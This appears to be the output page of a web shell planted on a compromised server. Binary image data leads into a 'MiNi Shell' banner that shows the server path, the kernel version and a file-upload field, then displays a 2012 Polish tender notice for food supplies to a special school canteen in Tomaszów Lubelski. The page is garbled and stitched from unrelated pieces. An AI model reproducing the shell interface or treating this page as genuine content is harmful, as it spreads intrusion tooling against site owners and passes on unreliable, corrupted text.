JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120806/286976-N-2012.html

<p class="kh_header"><b>Tomaszów Lubelski: Sukcesywna dostawa artrykułów spożywczych do stołówki SOSW w Tomaszowie Lubelskim</b><br>
<b>Numer ogłoszenia: 286976 - 2012; data zamieszczenia: 06.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalny Ośrodek Szkolno-Wychowawczy im.Janusza Korczaka w Tomaszowie Lubelski , ul. Wesoła 1, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 665 94 40, faks 084 665 94 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.soswtomaszowlub.stronaszkolna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artrykułów spożywczych do stołówki SOSW w Tomaszowie Lubelskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ  I    PIECZYWO
1.	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:
 >  chleb zwykły 500 g 	-	szt.  1.600
 >  chleb razowy  500 g	-	szt.      400
 >  drożdżówka    100 g	-	szt.   4.500
 >  bułka                 50 g	-	szt.      200
 >  bułka tarta         1 kg	-	kg          20
2. Wspólny Słownik Zamówień CPV:   15612500-6
3. czas trwania lub termin wykonania: od 1.09.2012 do 31.12.2012
4. kryteria oceny ofert:  najniższa cena

CZĘŚĆ II    MLEKO I JEGO PRZETWORY
1.	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:
 > mleko 2% tłuszczu      l.		-	  l .  1.400
 > masło 82% tł.            kg		-          kg       120
 > śmietana  18 % tł.        l.		-             l       200  
 > twaróg półtłusty        kg		-           kg      180
 > ser żółty salami         kg 		-           kg        20
 > serek homo.          100 g		-          szt.      200
                   2. Wspólny Słownik Zamówień CPV: 15500000-3
                   3. Czas trwania lub termin wykonania: od 1.09.2012 do 31.12.2012.

                   CZĘŚĆ III     MIĘSO I WĘDLINY
1.	Krótki opis ze wskazaniem wielkości lub zakres zamówienia
>  boczek wędzony         kg		-	kg    20
>  łopatka prasowana      kg		-	kg    40
>  kiełbasa toruńska        kg		-	kg    20
>  kiełbasa żywiecka       kg		-           kg    15
>  mortadela                    kg		-	 kg    30
>  kiełbasa parówkowa   kg 		-	 kg    20
>  paróweczki                  kg 		- 	 kg    40
>  pasztetowa                   kg 		- 	 kg    40
>  podgardlana                 kg 	 	-  	 kg    20
>  kiełbasa zwyczajna      kg 		-  	 kg    80
>  salceson włoski            kg		- 	 kg    20
>  ogonówka		  kg  		-   	 kg    10
>  szynka wędzona           kg		-	 kg    10
>  pieczeń rzymska           kg		-           kg     15
>  mielonka prasowana     kg		-	 kg     15
>  schab b/k		   kg  		-            kg    40
>  łopatka wieprz. b/k       kg		-            kg    60
>  karkówka wieprz. b/k   kg   		-  	 kg     15
>  szynka wieprz. b/k        kg                -            kg     10
>  mięso garmażer.           kg 		-	 kg      30
>  wątroba wieprz.            kg		- 	 kg      30
>  kości wieprz. schab.     kg		-            kg     20
>  słonina                          kg                 -            kg     30
>  smalec		              kg		- 	 kg      40
2. Wspólny Słownik Zamówień CPV  15100000-9,  15131120-2
3  Czas trwania lub termin wykonania   od 1.09.2012  do 31.12.2012
4. Kryteria oceny:   najniższa cena

CZĘŚĆ IV   RÓŻNE PRODUKTY SPOŻYWCZE
1.	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia.
> mąka  pszenna 		kg		-	kg  180
> mąka ziemniaczana       500 g 		-          szt.   10
> kasza manna                  500 g   		-          szt.   15
> kasza jęczmienna  	        500 g		-          szt.   10
> kasza gryczana                   kg		-	 kg   15
> płatki owsiane	        400 g  		-          szt.   15
> ryż  			             kg		-            kg   60
> makaron    		         500 g	  	-           szt.  120
> musztarda  nie mniej n iż 175 g 		-           szt.  120
> majonez nie mniej niż     700 g		-           szt.   35
   (winiary)
> keczup nie mniej niż       900 g		- 	 szt.  35
> koncentrat pomidor. min. 900 g                -           szt.   35
> chrzan   nie mniej niż       170 g 	  	-            szt.   60
> olej  			  litr                 -               l.   60
> ocet                                    0,5 l                -              szt.  10
>  ogórek konserw. min.      800 g		-             szt.   45
>  kukurydza konser. min.   400 g 		-             szt.   20
>  groszek konser. min.        400 g		-             szt.   25
>  sól 				    kg 		- 	     kg   80
>  cukier			    kg		-	     kg  200
>  cukier puder    		 500 g		-               szt. 150
>  cukier wanilinowy               szt.       	-               szt.  60  
                         >  kwasek cytrynowy              szt.                -               szt.  15
    >  herbata granul.                   100 g		-	     szt. 100
    >  dżem nie mniej niż             280 g		-                szt. 240
    >  miód              min.              400 g		-                szt.  15
    >  kawa inka      min.               150g		-                szt. 40
    >  kakao             min.              200 g             -	      szt. 15
    >  kisiel	                              szt.	-	      szt.  80
    >  budyń	                              szt. 	-                szt.  120
    >  rosołek drob.                        180g            -                 szt.  80
    >  pieprz naturalny czarny miel.  20 g.         -                szt.  80
    >  przyprawa maggi  min.          900 g          -                szt.   4
    >  przyprawa do zup min.          850 g	-	       szt.   15
    >  przyprawa vegeta lub równoważna  min. 500 g   -     szt.  10
    >  ziele angielskie 		        15g	  -	       szt.  10
    >  liść laurowy  		         15 g	  -                szt.  15
    > papryka miel. słodka                   20 g	  -	        szt. 10
    > przyprawa do mięs delikt           200 g	  -                szt.  15
    > sos boloński   min.                         szt          -               szt.  50
    > sos sałatkowy	                        szt.	   -               szt.   50
    >  zupa  fasolowa                              szt.         -               szt.  35
    >  zupa ogonowa	                        szt.         -               szt.  120
    >  zupa grzybowa	                        szt.         -               szt.   60
    >  zupa  pieczarkowa                         szt.        -               szt.   15
    >  żurek				  45 g      -               szt.    40
    >  barszcz biały                                   40 g     -               szt.    25 
    >  paprykarz   min.                           330 g     -                szt.   80
  >  pasztet        min.                           500 g     -          -  szt. 50
  > margaryna zwykła                        250 g	           -  szt. 120
  > margaryna śniadaniowa               500 g                  -  szt.  40         
  > konserwa turystyczna                   300 g		-  szt.  20
  > konserwa tyrolska		         300 g		-  szt.  20
2. Wspólny Słownik Zamówień CPV   15800000-6
3. Czas trwania lub termin wykonania  od 1.09.2012 do 31.12.2012
4. Kryteria oceny ofert;  najniższa cena 

CZĘŚĆ V  RYBY PRZETWORZONE I KONSERWOWE

1.	Krótki opis ze wskazaniem wielkości lub zakres zamówienia.
>  szprot w oleju          min.         300 g		-   szt  65
>  śledź w oleju            min.         170 g                       -   szt. 50
>   śledź w pomid.        min          170 g    		-   szt.  20
>   kotlet rybny                                 kg		-    kg  10
>   panga mrożona                            kg		-    kg  15
>   mintaj mrożony                           kg                        -    kg  15
2. Wspólny słownik Zamówień  CPV   15331100-8
3. Czas trwania lub termin wykonania od 1.09.2012 do 31.12.2012
4. Kryteria oceny ofert: najniższa cena

CZĘŚĆ VI   DRÓB

1.	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia;
>  ćwiartki z kurczaka		kg		-     kg   70
>  kurczak świeży		kg                    -     kg    10
>  udziec z indyka 		kg		-     kg    25
>  filet drobiowy		kg       		-     kg    10  
2. Wspólny Słownik Zamówień CPV   15112000-6
3. Czas trwania lub termin wykonania   od 1.09.2012 do 31.12.2012
4. Kryteria oceny ofert: najniższa cena

CZĘŚĆ VII    MROŻONKI

1.	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia
>   mieszanka warzywna - bukiet jarzyn         kg        -	 	kg     40
>   truskawka mrożona                                     kg        -                      kg     20
>   kalafior mrożony	   			kg        -                      kg     10
>   brokuł mrożony				kg        -		kg     10
>   włoszczyzna 				kg	-		kg     40     
2. Wspólny Słownik Zamówień  CPV    15331100-8
3. Czas trwania lub termin wykonania  od 1.09.2012  do 31.12.2012
4. Kryteria oceny ofert; najniższa cena

CZĘŚĆ VIII   OWOCE ŚWIEŻE  

1.	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia
>  jabłka gat.1 					kg	-	kg      600
>  śliwka 					kg        -          kg        60
>   gruszka 					kg	-	kg       100
2. Wspólny Słownik zamówień CPV   03121000-5
3. Czas trwania lub termin wykonania   od 1.09.2012  do  31.12.2012
4. Kryteria oceny ofert :  najniższa cena


CZĘŚĆ IX      WARZYWA >

1.	Krotki opis ze wskazaniem wielkości lub zakresu zamówienia
> cebula					kg		-	kg  150
> czosnek 				kg		-	kg      2
> marchew 				kg		-	kg  200
> pietruszka korzeń 			kg 		-	kg    40 
> seler 					kg 		-	kg    40
> por					kg 		-	kg    50
> kapusta kiszona			kg		-	kg    50
> kapusta biała				kg 		-  	kg   250
> kapusta pekińska			kg 		-	kg    10
> burak ćwikłowy			kg		-	kg   100 
> ogórek kwaszony			kg		- 	kg     50
>  pieczarka 				kg		-	kg     40  
>  kalafior				kg 		- 	kg     15
>  brokuł				kg 		-	kg     20
>  fasola Jaś 				kg		-   	kg     35
>  cytryna 				kg  		-	kg     40
2. Wspólny Słownik Zamówień CPV  15300000-1
3. Czas trwania lub termin wykonania  od 1.09.2012 do 31.11.2012
4. Kryteria oceny ofert : najniższa cena

CZĘŚĆ X    JAJA KURZE

1.	Krotki opis ze wskazaniem wielkości lub zakres zamówienia
>  jaja kurze kl. I     			szt.		-	szt. 2.700
2. Wspólny Słownik Zamówień  CPV  03142500-3
3. Czas trwania lub termin wykonania    od 1.09.2012  do 31.12.2012
4. Kryteria oceny ofert:   najniższa cena

CZĘŚĆ XI   PRODKTY MĄCZNE GOTOWE
1.	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia
>  uszka z grzybami 			kg		- 	kg   5
>  pyzy z mięsem			kg		-	kg  70
2. Wspólny Słownik Zamówień  CPV   15851000-8
3. Czas trwania lub termin wykonania  od 1.09.2012 do 31.12.2012
4. Kryteria oceny ofert:  najniższa cena

CZĘŚĆ XII     ZIEMNIAKI
1. krótki opis ze wskazaniem wielkości lub zakresu zamówienia 
> ziemniaki 				kg		-	kg  2.000
2. Wspólny Słownik Zamówień  CPV  03212100-1
3.Czas trwania lub termin wykonania  od 1.09.2012 do 31.12.2012
4. Kryteria oceny ofert:   najniższa cena.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6, 15.50.00.00-3, 15.10.00.00-9, 15.80.00.00-6, 15.20.00.00-6, 03.12.10.00-5, 15.30.00.00-1, 03.14.25.00-3, 15.85.10.00-8, 03.21.21.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tak/nie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tak/nie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tak/nie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tak/nie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tak/nie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.soswtomaszowlub.szkolnastrona.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalny Osrodek Szkolno - Wychowawczy w Tomaszowie Lubelskim
22-600 Tomaszów Lubelski ul. Wesoła 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2012 godzina 11:00, miejsce: Specjalny Ośrodek Szkolno Wychowawczy w Tomaszowie Lub.
22-600 Tomaszów Lubelski ul. Wesoła1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com